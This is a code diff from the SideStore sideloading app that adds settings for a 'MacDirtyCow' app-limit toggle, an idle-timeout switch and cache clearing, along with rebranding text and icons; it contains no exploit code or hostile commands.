                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="O5R-Al-lGj" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="779" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="830" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="O5R-Al-lGj" id="CrG-Mr-xQq">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -478,10 +514,50 @@
                                     </tableViewCell>
                                 </cells>
                             </tableViewSection>
+                            <tableViewSection id="y49-Tc-odS">
+                                <cells>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="DqL-lJ-MhM" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="917" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="DqL-lJ-MhM" id="KhD-Gc-Ehv">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="6NJ-PB-6Jz">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleMDCEnabled:" destination="aMk-Xp-UL8" eventType="valueChanged" id="9rd-cM-Yb1"/>
+                                                    </connections>
+                                                </switch>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable MDC" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="kux-ac-Ujm">
+                                                    <rect key="frame" x="30" y="15.5" width="98.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="kux-ac-Ujm" firstAttribute="centerY" secondItem="KhD-Gc-Ehv" secondAttribute="centerY" id="Ep6-5u-UiO"/>
+                                                <constraint firstItem="kux-ac-Ujm" firstAttribute="leading" secondItem="KhD-Gc-Ehv" secondAttribute="leadingMargin" id="M3Y-cf-s4C"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="6NJ-PB-6Jz" secondAttribute="trailing" id="SfD-jS-svQ"/>
+                                                <constraint firstItem="6NJ-PB-6Jz" firstAttribute="centerY" secondItem="KhD-Gc-Ehv" secondAttribute="centerY" id="ymQ-xO-ARV"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="0"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                </cells>
+                            </tableViewSection>
                             <tableViewSection headerTitle="" id="OMa-EK-hRI">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="FMZ-as-Ljo" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="870" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1008" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="FMZ-as-Ljo" id="JzL-Of-A3T">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -514,7 +590,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="Qca-pU-sJh" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="921" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1059" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="Qca-pU-sJh" id="QtU-8J-VQN">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -550,7 +626,7 @@
                                         </connections>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="rE2-P4-OaE" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="972" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1110" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="rE2-P4-OaE" id="qIT-rz-ZUb">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -582,11 +658,44 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
                                         </userDefinedRuntimeAttributes>
                                         <connections>
-                                            <segue destination="g8a-Rf-zWa" kind="show" identifier="showErrorLog" id="SSW-vL-86I"/>
+                                            <segue destination="g8a-Rf-zWa" kind="show" id="vFC-Id-Ww6"/>
                                         </connections>
                                     </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="eZ3-BT-q4D" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="1161" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="eZ3-BT-q4D" id="17m-VV-hzf">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Clear Cache" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="IbH-V1-ce3">
+                                                    <rect key="frame" x="30" y="15.5" width="98.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="FZe-BJ-fOm">
+                                                    <rect key="frame" x="327" y="16.5" width="18" height="18"/>
+                                                </imageView>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="FZe-BJ-fOm" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="bGv-Np-5aO"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="FZe-BJ-fOm" secondAttribute="trailing" id="ccb-JP-Eqi"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="iQJ-gN-sRF"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="leading" secondItem="17m-VV-hzf" secondAttribute="leadingMargin" id="m1g-Y6-aT5"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="VNn-u4-cN8" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1023" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1212" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VNn-u4-cN8" id="4bh-qe-l2N">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -619,7 +728,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="e7s-hL-kv9" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1074" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1263" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="e7s-hL-kv9" id="yjL-Mu-HTk">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -652,7 +761,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="fj2-EJ-Z98" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1125" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1314" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="fj2-EJ-Z98" id="BcT-Fs-KNg">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -689,15 +798,16 @@
                         </sections>
                         <connections>
                             <outlet property="dataSource" destination="aMk-Xp-UL8" id="c6c-fR-8C4"/>
-                            <outlet property="delegate" destination="aMk-Xp-UL8" id="moP-1B-lRq"/>
                         </connections>
                     </tableView>
                     <navigationItem key="navigationItem" title="Settings" id="Ddg-UQ-KJ8"/>
                     <connections>
+                        <outlet property="MDCSwitch" destination="6NJ-PB-6Jz" id="bwj-oN-oRv"/>
                         <outlet property="accountEmailLabel" destination="0uP-Cd-tNX" id="14b-aL-yE3"/>
                         <outlet property="accountNameLabel" destination="CnN-M1-AYK" id="Ldc-Py-Bix"/>
                         <outlet property="accountTypeLabel" destination="434-MW-Den" id="mNB-QE-4Jg"/>
                         <outlet property="backgroundRefreshSwitch" destination="DPu-zD-Als" id="eiG-Hv-Vko"/>
+                        <outlet property="noIdleTimeoutSwitch" destination="iQA-wm-5ag" id="jHC-js-q0Y"/>
                         <outlet property="versionLabel" destination="bUR-rp-Nw2" id="85I-5R-hqz"/>
                     </connections>
                 </tableViewController>
@@ -917,7 +1027,7 @@ Settings by i cons from the Noun Project</string>
             </objects>
             <point key="canvasLocation" x="1697" y="313"/>
         </scene>
-        <!--Patreon-->
+        <!--Support us-->
         <scene sceneID="Lnh-9P-HnL">
             <objects>
                 <collectionViewController id="dp8-8j-vt9" customClass="PatreonViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
@@ -964,7 +1074,7 @@ Settings by i cons from the Noun Project</string>
                             <outlet property="delegate" destination="dp8-8j-vt9" id="790-Kr-6l7"/>
                         </connections>
                     </collectionView>
-                    <navigationItem key="navigationItem" title="Patreon" largeTitleDisplayMode="always" id="uUV-1f-xEq"/>
+                    <navigationItem key="navigationItem" title="Support us" largeTitleDisplayMode="always" id="uUV-1f-xEq"/>
                 </collectionViewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="qq3-Hj-S9f" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>

AltStore/Settings/SettingsViewController.swift

@@ -24,19 +24,21 @@ extension SettingsViewController
         case appRefresh
         case instructions
         case credits
+        case mdc
         case debug
     }
     
     fileprivate enum AppRefreshRow: Int, CaseIterable
     {
         case backgroundRefresh
+        case noIdleTimeout
         
         @available(iOS 14, *)
         case addToSiri
         
         static var allCases: [AppRefreshRow] {
-            guard #available(iOS 14, *) else { return [.backgroundRefresh] }
+            guard #available(iOS 14, *) else { return [.backgroundRefresh, .noIdleTimeout] }
-            return [.backgroundRefresh, .addToSiri]
+            return [.backgroundRefresh, .noIdleTimeout, .addToSiri]
         }
     }
     
@@ -53,9 +55,11 @@ extension SettingsViewController
         case sendFeedback
         case refreshAttempts
         case errorLog
+        case clearCache
         case resetPairingFile
         case resetAdiPb
         case advancedSettings
+    
     }
 }
 
@@ -73,6 +77,8 @@ final class SettingsViewController: UITableViewController
     @IBOutlet private var accountTypeLabel: UILabel!
     
     @IBOutlet private var backgroundRefreshSwitch: UISwitch!
+    @IBOutlet private var noIdleTimeoutSwitch: UISwitch!
+    @IBOutlet private var MDCSwitch: UISwitch!
     
     @IBOutlet private var versionLabel: UILabel!
     
@@ -148,6 +154,30 @@ private extension SettingsViewController
         }
         
         self.backgroundRefreshSwitch.isOn = UserDefaults.standard.isBackgroundRefreshEnabled
+        self.noIdleTimeoutSwitch.isOn = UserDefaults.standard.isIdleTimeoutDisableEnabled
+        
+        let MDCMinimumVersion = OperatingSystemVersion(majorVersion: 14, minorVersion: 0, patchVersion: 0)
+        let MDCMaximumVersion1 = OperatingSystemVersion(majorVersion: 15, minorVersion: 7, patchVersion: 2)
+        let MDCMaximumVersionSep = OperatingSystemVersion(majorVersion: 16, minorVersion: 0, patchVersion: 0)
+        let MDCMaximumVersion2 = OperatingSystemVersion(majorVersion: 16, minorVersion: 2, patchVersion: 0)
+        
+        var canUseMDC = false
+        
+        if ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMinimumVersion) { // at least 14.0.0
+            if !ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersion1) { // not at least 15.7.2 (less than 15.7.2)
+                canUseMDC = true
+            }
+            if !ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersion2) && ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersionSep) { // not at least 16.2.0 but more than 16.0.0
+                canUseMDC = true
+            }
+        }
+        
+        if !canUseMDC {
+            UserDefaults.standard.isMDCEnabled = false
+        }
+        
+        self.MDCSwitch.isOn = UserDefaults.standard.isMDCEnabled
+        self.MDCSwitch.isEnabled = canUseMDC
         
         if self.isViewLoaded
         {
@@ -161,7 +191,7 @@ private extension SettingsViewController
         settingsHeaderFooterView.secondaryLabel.isHidden = isHeader
         settingsHeaderFooterView.button.isHidden = true
         
-        settingsHeaderFooterView.layoutMargins.bottom = isHeader ? 0 : 8
+        settingsHeaderFooterView.layoutMargins.bottom = isHeader ? 0 : 9
         
         switch section
         {
@@ -178,11 +208,11 @@ private extension SettingsViewController
         case .patreon:
             if isHeader
             {
-                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("PATREON", comment: "")
+                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("SUPPORT US", comment: "")
             }
             else
             {
-                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Support the SideStore Team by becoming a patron!", comment: "")
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("Support the SideStore Team by following our socials or becoming a patron!", comment: "")
             }
 
         case .account:
@@ -207,6 +237,21 @@ private extension SettingsViewController
             
         case .credits:
             settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("CREDITS", comment: "")
+        
+        case .mdc:
+            if isHeader
+            {
+                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("MACDIRTYCOW", comment: "")
+            }
+            else
+            {
+                #if MACDIRTYCOW
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("This only works on iOS 15 - 15.7.1 and iOS 16 - iOS 16.1.2", comment: "")
+                #else
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("This only works on iOS 15 - 15.7.1 and iOS 16 - iOS 16.1.2. This build is not a MacDirtyCow build, therefore this will only lift the 3 app limit", comment: "")
+                #endif
+                settingsHeaderFooterView.secondaryLabel.isHidden = false
+            }
             
         case .debug:
             settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("DEBUG", comment: "")
@@ -280,6 +325,22 @@ private extension SettingsViewController
         UserDefaults.standard.isBackgroundRefreshEnabled = sender.isOn
     }
     
+    @IBAction func toggleNoIdleTimeoutEnabled(_ sender: UISwitch)
+    {
+        UserDefaults.standard.isIdleTimeoutDisableEnabled = sender.isOn
+    }
+    
+    @IBAction func toggleMDCEnabled(_ sender: UISwitch)
+    {
+        UserDefaults.standard.isMDCEnabled = sender.isOn
+        if sender.isOn {
+            UserDefaults.standard.activeAppsLimit = 69420
+        }
+        else {
+            UserDefaults.standard.activeAppsLimit = 3
+        }
+    }
+    
     @available(iOS 14, *)
     @IBAction func addRefreshAppsShortcut()
     {
@@ -291,6 +352,39 @@ private extension SettingsViewController
         self.present(viewController, animated: true, completion: nil)
     }
     
+    func clearCache()
+    {
+        let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to clear SideStore's cache?", comment: ""),
+                                                message: NSLocalizedString("This will remove all temporary files as well as backups for uninstalled apps.", comment: ""),
+                                                preferredStyle: .actionSheet)
+        alertController.addAction(UIAlertAction(title: UIAlertAction.cancel.title, style: UIAlertAction.cancel.style) { [weak self] _ in
+            self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+        })
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Clear Cache", comment: ""), style: .destructive) { [weak self] _ in
+            AppManager.shared.clearAppCache { result in
+                DispatchQueue.main.async {
+                    self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+                    
+                    switch result
+                    {
+                    case .success: break
+                    case .failure(let error):
+                        let alertController = UIAlertController(title: NSLocalizedString("Unable to Clear Cache", comment: ""), message: error.localizedDescription, preferredStyle: .alert)
+                        alertController.addAction(.ok)
+                        self?.present(alertController, animated: true)
+                    }
+                }
+            }
+        })
+        
+        if let popoverController = alertController.popoverPresentationController {
+            popoverController.sourceView = self.view
+            popoverController.sourceRect = CGRect(x: self.view.bounds.midX, y: self.view.bounds.midY, width: 0, height: 0)
+        }
+        
+        self.present(alertController, animated: true)
+    }
+    
     @IBAction func handleDebugModeGesture(_ gestureRecognizer: UISwipeGestureRecognizer)
     {
         self.debugGestureCounter += 1
@@ -377,15 +471,26 @@ extension SettingsViewController
     {
         let cell = super.tableView(tableView, cellForRowAt: indexPath)
         
-        if #available(iOS 14, *) {}
+//        if #available(iOS 14, *) {}
-        else if let cell = cell as? InsetGroupTableViewCell,
+//        else if let cell = cell as? InsetGroupTableViewCell,
-                indexPath.section == Section.appRefresh.rawValue,
+//                indexPath.section == Section.appRefresh.rawValue,
-                indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+//                indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+//        {
+//            // Only one row is visible pre-iOS 14.
+//            cell.style = .single
+//        }
+        
+        if AppRefreshRow.AllCases().count == 1
         {
-            // Only one row is visible pre-iOS 14.
+            if let cell = cell as? InsetGroupTableViewCell,
-            cell.style = .single
+               indexPath.section == Section.appRefresh.rawValue,
+               indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+            {
+                cell.style = .single
+            }
         }
         
+        
         return cell
     }
     
@@ -396,7 +501,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return nil
         case .account where self.activeTeam == nil: return nil
-        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug, .mdc:
             let headerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(headerView, for: section, isHeader: true)
             return headerView
@@ -411,7 +516,7 @@ extension SettingsViewController
         switch section
         {
         case .signIn where self.activeTeam != nil: return nil
-        case .signIn, .patreon, .appRefresh:
+        case .signIn, .patreon, .appRefresh, .mdc:
             let footerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(footerView, for: section, isHeader: false)
             return footerView
@@ -427,7 +532,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0
-        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug, .mdc:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: true)
             return height
             
@@ -442,7 +547,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0            
-        case .signIn, .patreon, .appRefresh:
+        case .signIn, .patreon, .appRefresh, .mdc:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: false)
             return height
             
@@ -465,11 +570,13 @@ extension SettingsViewController
             switch row
             {
             case .backgroundRefresh: break
+            case .noIdleTimeout: break
             case .addToSiri:
                 guard #available(iOS 14, *) else { return }
                 self.addRefreshAppsShortcut()
             }
             
+            
         case .credits:
             let row = CreditsRow.allCases[indexPath.row]
             switch row
@@ -507,6 +614,9 @@ extension SettingsViewController
                     let toastView = ToastView(text: NSLocalizedString("Cannot Send Mail", comment: ""), detailText: nil)
                     toastView.show(in: self)
                 }
+                
+            case .clearCache: self.clearCache()
+
             case .resetPairingFile:
                 let filename = "ALTPairingFile.mobiledevicepairing"
                 let fm = FileManager.default
@@ -559,6 +669,7 @@ extension SettingsViewController
                     ELOG("UIApplication.openSettingsURLString invalid")
                 }
             case .refreshAttempts, .errorLog: break
+
             }
             
         default: break

AltStoreCore/Extensions/UserDefaults+AltStore.swift

@@ -27,9 +27,10 @@ public extension UserDefaults
     @NSManaged var preferredServerID: String?
     
     @NSManaged var isBackgroundRefreshEnabled: Bool
+    @NSManaged var isIdleTimeoutDisableEnabled: Bool
     @NSManaged var isDebugModeEnabled: Bool
     @NSManaged var presentedLaunchReminderNotification: Bool
-    
+    @NSManaged var isMDCEnabled: Bool
     @NSManaged var legacySideloadedApps: [String]?
     
     @NSManaged var isLegacyDeactivationSupported: Bool
@@ -72,6 +73,7 @@ public extension UserDefaults
         
         let defaults = [
             #keyPath(UserDefaults.isBackgroundRefreshEnabled): true,
+            #keyPath(UserDefaults.isIdleTimeoutDisableEnabled): true,
             #keyPath(UserDefaults.isLegacyDeactivationSupported): isLegacyDeactivationSupported,
             #keyPath(UserDefaults.activeAppLimitIncludesExtensions): activeAppLimitIncludesExtensions,
             #keyPath(UserDefaults.localServerSupportsRefreshing): localServerSupportsRefreshing,

AltStoreCore/Model/InstalledApp.swift

@@ -192,7 +192,7 @@ public extension InstalledApp
     
     class func fetchAppsForRefreshingAll(in context: NSManagedObjectContext) -> [InstalledApp]
     {
-        var predicate = NSPredicate(format: "%K == YES AND %K != %@", #keyPath(InstalledApp.isActive), #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)
+        let predicate = NSPredicate(format: "%K == YES AND %K != %@", #keyPath(InstalledApp.isActive), #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)
         print("Fetch Apps for Refreshing All 'AltStore' predicate: \(String(describing: predicate))")
         
 //        if let patreonAccount = DatabaseManager.shared.patreonAccount(in: context), patreonAccount.isPatron, PatreonAPI.shared.isAuthenticated
@@ -223,7 +223,7 @@ public extension InstalledApp
         // Date 6 hours before now.
         let date = Date().addingTimeInterval(-1 * 6 * 60 * 60)
         
-        var predicate = NSPredicate(format: "(%K == YES) AND (%K < %@) AND (%K != %@)",
+        let predicate = NSPredicate(format: "(%K == YES) AND (%K < %@) AND (%K != %@)",
                                     #keyPath(InstalledApp.isActive),
                                     #keyPath(InstalledApp.refreshedDate), date as NSDate,
                                     #keyPath(InstalledApp.bundleIdentifier), StoreApp.altstoreAppID)

AltWidget/Assets.xcassets/AltStore.imageset/Contents.json

@@ -5,12 +5,12 @@
       "scale" : "1x"
     },
     {
-      "filename" : "Group 23_120.png",
+      "filename" : "1024.png",
       "idiom" : "universal",
       "scale" : "2x"
     },
     {
-      "filename" : "Group 23_180.png",
+      "filename" : "1024.png",
       "idiom" : "universal",
       "scale" : "3x"
     }

AltWidget/Assets.xcassets/Badge.imageset/Contents.json

@@ -1,7 +1,7 @@
 {
   "images" : [
     {
-      "filename" : "group16Copy2.pdf",
+      "filename" : "sidestore-logo.svg",
       "idiom" : "universal"
     }
   ],

AltWidget/Assets.xcassets/Badge.imageset/sidestore-logo.svg

@@ -0,0 +1,17 @@
+<svg version="1.2" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" width="100" height="100">
+	<title>sidestore-logo-svg</title>
+	<style>
+		.s0 { fill: none } 
+		.s1 { fill: #bebbb4 } 
+	</style>
+	<g id="Layer">
+		<g id="Layer">
+			<path id="Main" class="s0" />
+			<g id="Main1">
+				<g id="Layer">
+					<path id="Layer" fill-rule="evenodd" class="s1" d="m86 50c0 2.3-1.9 4.2-4.2 4.2h-50.9c-2.3 0-4.2-1.9-4.2-4.2 0-2.3 1.9-4.2 4.2-4.2h50.9c2.3 0 4.2 1.9 4.2 4.2zm-31.8-23.3v2.1c0 3.4-1.3 6.6-3.7 9-2.4 2.4-5.6 3.7-9 3.7h-10.6c-2.2 0-4.4 0.9-5.9 2.5-1.6 1.6-2.5 3.8-2.5 6 0 2.2 0.9 4.4 2.5 6 1.5 1.6 3.7 2.5 5.9 2.5h10.6c3.4 0 6.6 1.3 9 3.7 2.4 2.4 3.7 5.6 3.7 9v10.8c0 1.1-0.4 2.1-1.1 2.8-0.8 0.8-1.8 1.2-2.9 1.2h-0.4c-1.1 0-2.1-0.4-2.9-1.2-0.7-0.7-1.1-1.7-1.1-2.8v-10.8c0-1.1-0.5-2.2-1.3-3-0.8-0.8-1.8-1.3-3-1.3h-10.6c-4.5 0-8.8-1.7-11.9-4.9-3.2-3.2-5-7.5-5-12 0-4.5 1.8-8.8 5-12 3.1-3.2 7.4-4.9 11.9-4.9h10.6c1.2 0 2.2-0.5 3-1.3 0.8-0.8 1.3-1.9 1.3-3v-2.1h-4.3l8.5-12.7 8.5 12.7zm12.7 55.3c0 2.2-1.8 4-4 4h-0.5c-2.2 0-4-1.8-4-4v-19.5c0-2.2 1.8-4 4-4h0.5c2.2 0 4 1.8 4 4z"/>
+				</g>
+			</g>
+		</g>
+	</g>
+</svg>

AltWidget/Assets.xcassets/SmallIcon.imageset/Contents.json

@@ -1,7 +1,7 @@
 {
   "images" : [
     {
-      "filename" : "altminicon.pdf",
+      "filename" : "cir.svg",
       "idiom" : "universal"
     }
   ],

AltWidget/Assets.xcassets/SmallIcon.imageset/cir.svg

@@ -0,0 +1,3 @@
+<svg width="100" height="100" version="1.1" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
+ <circle cx="50" cy="50" r="50" fill="#fff" stroke-width=".265"/>
+</svg>

